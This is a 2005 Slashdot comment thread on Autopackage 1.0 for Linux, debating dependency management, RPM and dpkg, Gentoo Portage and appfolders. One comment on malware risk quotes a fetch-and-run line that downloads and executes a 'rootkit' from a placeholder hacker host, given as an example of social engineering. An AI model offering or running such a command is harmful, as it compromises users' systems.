Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Announcements Software Linux

AutoPackaging for Linux 623

Isak Savo writes "The next generation packaging format for Linux has reached 1.0. With Autopackage officially declared stable, there is now an easy way for developers to create up to date, easy installable packages. There are lots of screenshots available including a flash demo of a package installation."
This discussion has been archived. No new comments can be posted.

AutoPackaging for Linux

Comments Filter:
  • by karmaflux ( 148909 ) on Sunday March 27, 2005 @03:43PM (#12061131)
    Not everyone wants to tie themselves to a huge complex packaging system. Some of us are perfectly happy with checkinstall. Thanks anyway.
  • by mp3phish ( 747341 ) on Sunday March 27, 2005 @03:54PM (#12061206)
    Because maybe your package is a small project not yet picked up by the distributions. Are you as the maintainer going to package it for debian, mandrake, redhat, and suse? Or would you rather convert your tarballs into autopackages?

    I think if I were an upstart package, and nobody were packaging me for their distro, I would want to be converted to an autopackage.
  • I'm a gentoo user as well, but I'm very excited by Autopackage. The whole reason many people use gentoo is b/c it is so easy to install software. The main problem with that system is that someone has to add it to the portage tree, and if it's not popular enough, it won't get in... with Autopackage you put the installation in the developers hands and you no longer have to rely on your distro to do it for you. I say use Portage/Apt/Whatever for your system/low-level programs and use autopackage for your higher level ones (Firefox, Gaim, GIMP, etc)...Autopackage could finally be the answer many Windows users have been waiting on to make the switch!
  • Re:Wrong Paradigm (Score:2, Interesting)

    by isaks ( 871187 ) on Sunday March 27, 2005 @04:01PM (#12061239) Homepage
    If the package is a self extracting installer or a rpm/deb/whatever doesn't make the slightest difference. It all boils down to if you trust the author of the package or not. A major difference with autopackage wrt rpm/deb/whatever is that the upstream software author creates the package, not random packager joe. If you don't trust the author, you shouldn't be using the software, regardless of package format!
  • Re:Linux (Score:3, Interesting)

    by Doc Ruby ( 173196 ) on Sunday March 27, 2005 @04:07PM (#12061270) Homepage Journal
    Which platform had packages installable from the Net, with dependencies and versioning, by clicking a single GUI button, in 1990? Or typing "installer install package"? One of the reasons I prefer Debian to Windows is precisely because of the package method of SW distribution. The closest MS has come is its WindowsUpdate abominations.
  • by jesterzog ( 189797 ) on Sunday March 27, 2005 @04:12PM (#12061300) Journal

    I'm presently running Debian. I've briefly played with making my own .deb files so I'd be able to install some of my own things without necessarily completely losing track of everywhere they were scattered. With all of the extra meta files that need editing, the source packages versus binary packages, and everything else, though, the whole process of designing a .deb package looked a bit too structured and complicated for me to bother learning about... at least within the time I was prepared to spend.

    If AutoPackage has a straightforward way to generate a simple package, such as from a tar.gz file, I might find it very helpful. What I'm wondering about, though, is how bad does it get when two package managers conflict? eg. Apt and AutoPackage might end up trying to control the same file, get mixed up between what manager is providing a particular dependency (particularly if Apt tries to grab a package that AutoPackage has already installed), or whatever else.

    It also sounds a bit of extra work having two sets of commands to manage packages on one system, so ideally (in my world), I guess AutoPackage would wrap around Apt or whatever other manager, and invoke it when appropriate. Does AutoPackage just fight for control when there are conflicts, or does it integrate with other package managers nicely?

    The server seems to be very slashdotted right now, so I can't do much reading up on it. Does this sort of conflict thing turn out to be much of a problem?

  • by levell ( 538346 ) on Sunday March 27, 2005 @04:20PM (#12061333) Homepage
    Until I can install an autopackage on my FC3 desktop and rpm (and therefore yum) can use it in dependency resolution and update it then I don't intend to use it.

    This isn't meant to be a criticism, I realise that they plan to do this and it takes time, to do everything that everyone wants is a long process ;)
  • Comment removed (Score:4, Interesting)

    by account_deleted ( 4530225 ) on Sunday March 27, 2005 @04:22PM (#12061347)
    Comment removed based on user account deletion
  • Re:Linux (Score:1, Interesting)

    by Anonymous Coward on Sunday March 27, 2005 @04:31PM (#12061385)
    since when? all the Windows applications I've run into only have one installer and they work fine on all Win32 based machines. Some web-sites provide two different versions, one for Win9x/ME and one for Win2000/XP, but the ones I've seen are doing it solely for optimization purposes.
    of course there are certain programs that *only* work on an NT kernel and those don't even come for Win9x/ME, but that is not the issue here.
  • Re:Wrong Paradigm (Score:3, Interesting)

    by labratuk ( 204918 ) on Sunday March 27, 2005 @04:36PM (#12061404)
    Bittorrent calls you a liar, buddy. We trade 5.25" floppies in a metaphorical sense constantly.

    That's content, not programs. Completely different. And when it's linux iso's They're always the same because they are checked against the hashes. The end result is the same thing as having a very fast ftp.

    When I develop a program that takes random input and outputs Frank & Earnest cartoons, I don't want to have to wait for some Board of Linux Usage Oversight to give my 5k perl script the Stamp of Approval.

    Then don't. Package it with autopackage, rpm, a tarball, whatever, just beware that users installing it could screw with the way the distro wants things to be done and could mess things up.

    Your average desktop user does not want to compile software. Dropping to a terminal, cd pathtoapp, tar -jxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user

    Nobody is saying that. Straw man.

    What a user can do is use yum, apt, yast, emerge, or a gui tool like synaptic. That's not difficult.

    Don't just slap their hand and yell NO.

    Nobody's doing that. They're still able to install whatever software they like from wherever they like, but if it causes problems for you, well, I'm probably not going to be able to help you with it buddy.
  • Re:BackPackage (Score:5, Interesting)

    by IamTheRealMike ( 537420 ) on Sunday March 27, 2005 @04:42PM (#12061430)
    The really big leap in backends would be a distributed repository.

    I suspect you are thinking of something like Conary. However ... that said, a distributed and decentralised package management system is what autopackage is all about. Autopackages can resolve dependencies in a manner that does not require large monolithic databases: the packages themselves know where to go to find their dependencies if they're missing (and in future they'll be able to use yum, apt-get etc as well just in case).

    Basically the apt-get type model doesn't work too well once you start having say >50 repositories all together, as co-ordinating the overlaps becomes too much of a nightmare. A much less tightly coupled system works better, which is what we have here.

  • by k8to ( 9046 ) on Sunday March 27, 2005 @04:45PM (#12061452) Homepage
    Every time autopackage gets mentioned, I look into it, only to come away lost as to what problem the project is trying to solve.

    It claims to provide binary packages which will install on any distribution, but I don't see any sort of information about how the project plans to address the fact that binary interfaces on linux systems are moderately unstable. It just seems quixotic.
  • by Anonymous Coward on Sunday March 27, 2005 @04:58PM (#12061516)


    http://zero-install.sourceforge.net/ [sourceforge.net]

    A young project but quite revolutionary. Applications run from cache. A GUI to this for those not friendly with the CLI could be significant.

    Make sure you read the page to understand what it offers and why.

    By the way I prefer the Debian way of installing software, it's a no-brainer.

    I use the CLI but my 10 year old cousin uses http://kefk.net/Linux/Distributionen/Allgemein/Fed ora/Versionen/Core.1/Screenshots/kpackage.png [kefk.net] KPackage as an interface to apt.

    Just Works TM.
  • by keesh ( 202812 ) on Sunday March 27, 2005 @05:16PM (#12061627) Homepage
    LSB is a redhatism. Some parts of it are utterly daft. You know that X is mandatory under LSB, right?
  • by DeepHurtn! ( 773713 ) on Sunday March 27, 2005 @05:48PM (#12061765)
    It also claims to be able to keep track of dependencies regardless of how you installed the package: source, rpm, etc. That is also very nice. I hope this works well and catches on with projects -- I imagine it would make both developer's and user's lives easier.
  • Portage would never be ported (no pun intended) to *BSD, because we already have Ports.

    Don't tell these people [gentoo.org].
  • by Anonymous Coward on Sunday March 27, 2005 @06:16PM (#12061909)
    "The whole reason many people use gentoo is b/c it is so easy to install software"

    Hmm.

    --
    $ emerge --pretend --update world
    These are the packages that I would merge, in order:

    Calculating world dependencies /
    !!! All ebuilds that could satisfy ">=dev-libs/boehm-gc-6.4" have been masked.
    !!! One of the following masked packages is required to complete your request:
    - dev-libs/boehm-gc-6.4 (masked by: ~x86 keyword)

    For more information, see MASKED PACKAGES section in the emerge man page or
    section 2.2 "Software Availability" in the Gentoo Handbook.
    !!! (dependency required by "media-gfx/inkscape-0.41" [ebuild])

    !!! Problem with ebuild media-gfx/inkscape-0.41
    !!! Possibly a DEPEND/*DEPEND problem.

    !!! Depgraph creation failed.
    --

    OK, so that's my fault - I've unmasked Inkscape and now the latest masked version has another masked dependency.

    There's two problems here.

    1) I had to unmask some packages to get them to work. Notably Meld, which has been unmasked since I first tried to install it last year and discovered that the "stable" ebuild was actually completely broken and wouldn't even compile. There were lots of posts on forums and bug reports about it for months but it remained broken, the standard solution was "unmask it and use a newer one, they work fine!". So, there's some slack QA going on somewhere - either the new packages are OK to unmask and it should be done upstream or the old one should be fixed. Inkscape was similar, but not quite as severely broken. aMule is the same - the "stable" 1.2.8 version in Portage is actually extremely unstable and buggy, and it's presently impossibly to build any of the (much more stable) 2.0-pre series without doing a USE="-GTK2" and getting a seriously ugly GUI.

    2) Emerge is bombing out cheerfully when I try to update purely because it's hitting one dependency problem on Inkscape. It would make more sense for it to ignore any available updates to Inkscape and try to update the rest of my software, like Firefox. Maybe there's an obscure switch for this I haven't read up on, but it's hardly "... so easy to install software!".

    Gentoo is technically quite interesting, but it has the occasional package management snarl-up - just like all the other distros!

    Autopackage seems like a good idea to me too, though.
  • by roskakori ( 447739 ) on Sunday March 27, 2005 @06:34PM (#12061993)

    I read the developer quickstart guide, and still can't figure out if this will help me with integrating a Java application.

    Right now, I use an installer based on IzPack [izforge.com], which works but results in an application that must be started from a shell script and does not integrate in the desktop. In particular, the user can not just double click files that have been created with my application. Also annoing is the fact that the installer includes trivial libraries like log4j, which causes bloat. And worse, some libraries have to be downloaded manually, in my case JAI [sun.com]. I'd say my application is a horrible user experience under Linux.

    However, the developer quick guide just keeps talking about about C compilers, GTK and other stuff I don't use or care about. Is there any point in taking a closer look at autopackage?

  • by agraupe ( 769778 ) on Sunday March 27, 2005 @06:57PM (#12062108) Journal
    and I was amazed by how well it worked! I think this could easily be the answer to the linux software installation problem. I am a gentoo user, and I like portage, but autopackage is a slick piece of software. Perhaps it could be used in conjunction with portage (i.e. remove the idea of "gentoo packages" for end-user-type-apps and make portage interface to autopackage). Either way, I think that a stable Autopackage definitely is a step forward for desktop linux.
  • by Storlek ( 860226 ) on Sunday March 27, 2005 @07:46PM (#12062372)
    I'd like to see a GUI wrapper around ./configure && make && make install -- a window with checkboxes for all the different --enable and --with options, a button to change what directories the program is installed to, and a "build" button at the bottom. Do all the configuring in a hidden embedded terminal widget, and have a "details" button for people who really want to look at the stuff scrolling by. It could be written with PyGtk (or whatever else; maybe it could even detect KDE or Gnome and use the appropriate toolkit) so it'd run on any architecture, maybe even have extensions to call apt-get or rpm to automatically resolve dependencies for the major distributions.

    This could even be done with a shell script wrapper around a tar.bz2 file (think shar, or the old StarOffice installer), so when it's double clicked in the file manager it would untar itself into a temporary directory and install.
  • by doc modulo ( 568776 ) on Sunday March 27, 2005 @07:52PM (#12062421)
    Mod parent up please!

    Packages are much more complicated conceptually (files all over the place for example) than appfolders.
    Then why use packages? I think the reasons are:
    1. Efficiency of HD space and memory
    2. Some things are easier to do with files all over the place.

    In the end, it's millions of people who have to put up with the confusing situation of packages just so that a few very smart developers can have it easier. That's the wrong way around! Even those same developers USE the program many more times than they have to package it up.

    #1 Efficiency on the HD is not THAT important anymore. Multiple copies of libraries on your HD inside different appfolders are doable. Efficiency inside RAM can probably be the same as with packages. Maybe make a big index of all the libraries that are available inside the appfolders on the system.

    #2 There MUST be ways around the problems with appfolders. There are only a couple minor ones left. Programmers are supposed to be smart, persistent people. As I said, there MUST be a way around the problems.
    Maybe a Daemon that keeps a lookout for everything that has to do with appfolders.

    Daemon: "Oh there's a new appfolder in the /programs folder? Let's update the library index with the libraries found inside it"

    I don't know exactly, but what I DO KNOW is that the end result of working out all the puzzles surrounding appfolders in the end will make life much better for millions of people. MAYBE the programmers will have to do a little extra work or be just a little bit smarter (probably not) but they ARE the smart ones in this scenario, if there's anybody who has to go through hoops it's supposed to be the programmers, not the users. Besides, programmers are mostly program users as well, they'll get the big benefits just as mortals will.

    In the end you cannot talk your way out if this: PC's are supposed to be our slaves and take away work. Users should be able to work with a PC like THEY would like to work with it (appfolders, GUI etc.)

    When you're saying: "PC users should learn this and that to install a program" You're basically saying we should steer the evolution of the human race (a program is a thing like this rock I can pick up) into a new direction just so they can work with PC's and packages like they are now.

    The PC will improve and change very fast, it should be in the right direction. That direction is to make the PC into something an average human, evolved over millions of years, can use as easy as possible.
  • Re:Wrong Paradigm (Score:3, Interesting)

    by internic ( 453511 ) on Sunday March 27, 2005 @07:54PM (#12062428)

    I don't know much technical detail about software packaging, either in Windows or Linux, so I can only speak based upon my experience. My experience has been that package management in Linux is much preferable to Windows. When I used Windows 2000, I would often install software that later could not be fully or completely uninstalled (broken uninstall), and often software that was installed would make undesirable and unauthorized changes to settings like file associations. I'm not talking about malware here, just legitimate software behaving badly.

    Since I've been using Linux, I find that installing packages has predictable results without the unpleasent side effects I mentioned before, and I have yet to have any issues completely removing unneeded software. What's more, installation is generally simpler and more rapid, e.g. apt-get install foo. This was true using both apt-get and urpmi. I won't attempt to claim this is universal, I will only say that it's my experience.

    I always throught that in windows the installer what a standalone program that could essentially do whatever it wanted, and uninstallation depended on the good graces of that software. I'm not sure that this is the case, but it seems to fit my experiences. That system always seemed backward to me, because I'd rather that a trusted program on my system perform installation tasks and keep track of them for later removal. This seems to be what happens in apt-get like systems, and it has led to much more desirable results in my case.

  • Re:Missing the point (Score:3, Interesting)

    by Minna Kirai ( 624281 ) on Sunday March 27, 2005 @09:12PM (#12062789)
    . It's meant to aid the installation of packaged software from third party sources and manage dependancies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.

    The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low explotiation value of that population (same as the largest reason there are few "viruses").

    Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)

    If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their homedirectories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)
  • by Nailer ( 69468 ) on Sunday March 27, 2005 @09:22PM (#12062821)
    The FAQ answers that question with:

    What RPM is not good at is non-core packages, ie programs available from the net, from commercial vendors, magazine coverdisks and so on.

    Why not? If you're going to spend a metric shitload of time creating a new packaging format and you want anyone to use it, some actual justification might help.

    Personally, I'd add non DB backends, suggests/recommends, and non root installs to RPM, or add better file / signature verification, a DB backend, and non root installs to dpkg.
  • by Nailer ( 69468 ) on Sunday March 27, 2005 @09:41PM (#12062905)
    Actually, I'll bite on some of his later answers, where, unlike the one to the previous question. he does go through some specific issues he has 'with RPM/Dpkg':

    "Other dependencies are not so simple, there is no file that reliably expresses the dependency, or the file could be in multiple locations"

    Yes, that's what virtual dependencies / capabilities in both rpm and dpkg provide. As for files moving around, that's what the FHS is for. Got a

    But in reality, you don't encounter this scenerio untill you install rpms/ debs on another distro. Big deal: binary packages will always be built against specific library versions. Autopackage doesn't solve that.

    "because RPM is, at the end of the day, a tool to help distro makers, they sometimes add new macros and features to it and then use them in their specfiles. People want proper integration of course, so they use Mandrake specific macros "

    That's a human problem. You can't fix it with technology. Taking away the ability to have custom macros is a bad thing. Encouraging proper behavior is a better thing.

    "Bad interactions with source code: because the current versions of RPM don't check the system directly, they only check a database"

    You don't mean bad interaction with source code. Installing from source works fine, provided you know how to make install you can easily reate an RPM of most autoconf apps in about 2 minutes.

    You mean bad interaction with non-packaged software. Again, that's a human issue, but one that's been solved better and better over time. Both OSS projects and proprietary vendors including Adobe's, BEAs, Macromedia etc. all release properly packaged binaries.

    And frankly, I like having a database. I want to be able to find out what package was responsible for installing a file, and a URL where I can get a new version of the software. I like having a checksum of all my files at install time, so I can see if they've changed later. All of which autopackage doesn't do.

    I don't like anything that encourages people to install unsigned applications from the internet, which autopackage does.

    "a dependency does not encode any information on where to find it"

    Yes, Great they kept that shit out of the dependency isn't it? Because what provides that capability isn't determined by the software. My app needs a webserver. That could be thhtpd, Apache httpd, Roxen, or whatever else. Rather than specifying what package provides that dependency, they simply list the depency. Three of my available packages say they provide a webserver capability. When a new webserver comes out, it will say it provides that capability too. Without requiring a new package of the thing that wants a webserver. Brilliant stuff!

  • by idlake ( 850372 ) on Sunday March 27, 2005 @09:48PM (#12062926)
    YOU might manage to get everything you need out of the software included in your distro, but do you really expect the big distros to anticipate every single need of every single user?

    The way it works out in practice on Debian is that, for most people, once it's mature enough to be included in the distro, it's part of the distro. Until then, you probably want to install it from source anyway, which is an option you always have.

    Should a good distro include a version of GAMESS just because I want to do a theoretical chemistry calculation?

    Yes. More accurately, someone should become a binary package maintainer for each distribution. As part of that, that person has to assume responsibility for not breaking anything in the distro. Creating an "Autopackage" and pretending that that solves the integration problems "automatically" just isn't going to do the trick; you might as well only distribute the sources.
  • A few quick comment on your FAQ:

    The first reason is the lack of dependency management. Because you are simply moving folders around, there is no logic involved so you cannot check for your apps dependencies.

    OS X handles this at runtime. i.e. You can install the software, but the folder contents contain enough information for the OS to give you an error message when you run it. Usually this amounts to nothing more than "OS X 10.3 required!", but it could be more. FWIW, I think the lack of a "standard" set of OS services in Linux complicates this issue. Under OS X (and to a certain degree Windows), developers always know which libraries they can always depend on, and which ones they should bundle.

    You'll note that bundled APIs on OS X and Windows tend not to duplicate each other across a given set of installed programs.

    One obvious one is that there is no uninstall logic either, so the app never gets a chance to remove any config files it placed on the system.

    This would be true on Linux, but it is NOT true on OS X. In OS X, the desktop integrates with the filesytem and learns via events when an application is added or deleted. This means that OS X users see file associations as soon as the program is added to the system, and they also see the deletion of those associations when the program is removed. It's all very seamless and prevents the dangling associations that plague Windows.

    The OS X FS takes things one step further by storing file system IDs instead of path names for everything. This means that if I move my program from the Desktop to Applications, the associations will move with it. Similarly, if I have a file open and I move it, my file will save to the new location instead of the old one.

    Another is that the app menus are largely determined by filing system structures. This means that it's hard to have separate menus for each user/different desktop environments without huge numbers of (manually maintained) symlinks.

    1. An application menu IS just a bunch of glorified symlinks.

    2. OS X handles this by having a system wide Applications folder for all users. If users wish to have private programs, they can drag them to their desktop or home folder.

    3. The dock is the user's customized menu. The most commonly used apps are usually already there so that users don't have to hunt for them. If a user wants another app on his dock, he can drag it on there to create a shortcut. Shortcuts are deleted by dragging the icon off the dock or into the trash can.

    What your FAQ should say is, "Unfortunately, the Linux design philosophy precludes the use of an appfolders system, as the services required to make such a system work are most likely unavailable on most installations."

    Now with that cleared up, good job guys. I'm glad to see that someone is finally tackling my number one Linux gripe. (Check my Journal for more info.) :-)
  • by marafa ( 745042 ) on Monday March 28, 2005 @03:58AM (#12064500) Homepage Journal
    the makers of CUPS: the Common Unix Printing System has another product called EPM: Easy Package Management available at http://www.easysw.com/epm/ [easysw.com].

    EPM is a free UNIX software/file packaging program that generates distribution archives from a list of files.
    EPM Can:

    * Generate portable script-based distribution packages complete with installation and removal scripts and standard install/uninstall GUIs.
    * Generate "native" distributions in AIX, BSD, Debian, HP-UX, IRIX, MacOS X, Red Hat, Slackware, Solaris, and Tru64 UNIX formats.
    * Provide a complete, cross-platform software distribution solution for your applications.

    ____
    to the guy marking my comments as -1: why?
  • by FooBarWidget ( 556006 ) on Monday March 28, 2005 @06:34AM (#12064861)
    Native package manager integration is planned for post-1.0.

UNIX is hot. It's more than hot. It's steaming. It's quicksilver lightning with a laserbeam kicker. -- Michael Jay Tucker

Working...